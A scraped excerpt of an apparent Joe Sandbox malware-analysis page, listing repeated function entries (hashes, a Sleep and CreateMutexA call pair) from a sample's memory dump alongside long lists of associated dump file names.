Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c4494d1b446eafe9efb7819e16c3adc8132e0898bbc14bf6371959620f2066d9
Instruction ID: 93990f078a5e46de94f57fc9bac1d1c66d734085870ff64aa8a8be8bd0b083fa
Opcode Fuzzy Hash: c4494d1b446eafe9efb7819e16c3adc8132e0898bbc14bf6371959620f2066d9
Instruction Fuzzy Hash: AE312531B00214DBEF089B68ED9D76DB772AF96324F648218E414972D2D7368AE08752

Function 0012A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 05267d4e37a19df6976c624f24f707986c1d3e460e8be071f82514ed4a77f8d2
Instruction ID: 00c17766dcb491baaff1739e062df51d2482a74b58cc2e258ce26c7b5c2b1484
Opcode Fuzzy Hash: 05267d4e37a19df6976c624f24f707986c1d3e460e8be071f82514ed4a77f8d2
Instruction Fuzzy Hash: 58315931B002448BEF08AB78F89D76DB772EFD5324F644218E4249B3C6D7759AD08752

Function 0012A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 471fbf510d1edba6c22fff34d3d774d6f74291efdff481c7b1d8e08957647ca3
Instruction ID: ecb319af0e2d7e9cf0c3727c253bc37ce9131f156f2c6ef7278dc818ed1a2e4a
Opcode Fuzzy Hash: 471fbf510d1edba6c22fff34d3d774d6f74291efdff481c7b1d8e08957647ca3
Instruction Fuzzy Hash: 37312731B001148BEF08DB78E89976DB762EFC5324F648218E4159B2D2CB3599D08752

Function 0012A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 22fb851ef383d006a0ec7b52f86a844971698d8e216e87f1d356c1ae6913b735
Instruction ID: abd84b6e01886f39fc4bbc63d4342940621213317f46b2044442427658b44939
Opcode Fuzzy Hash: 22fb851ef383d006a0ec7b52f86a844971698d8e216e87f1d356c1ae6913b735
Instruction Fuzzy Hash: EB312631B00214CBEF08DB78ED9D76DB772EF85324F648218E4299B2D2C7369AD08756

Function 00129ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e6e4349d47a97a4e7ae9fb0fce8b7687d396ae7c7d03890c1e36d3077fed04cf
Instruction ID: fae29d7538f9544250e0d97affb95e4cf817a7b8b2c0b96f7445168372f6d371
Opcode Fuzzy Hash: e6e4349d47a97a4e7ae9fb0fce8b7687d396ae7c7d03890c1e36d3077fed04cf
Instruction Fuzzy Hash: D2216731B04204DBEF189B6CFCA9B2CB362EFC1310F24422DE418872D2DB765AE08711

Function 0012A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
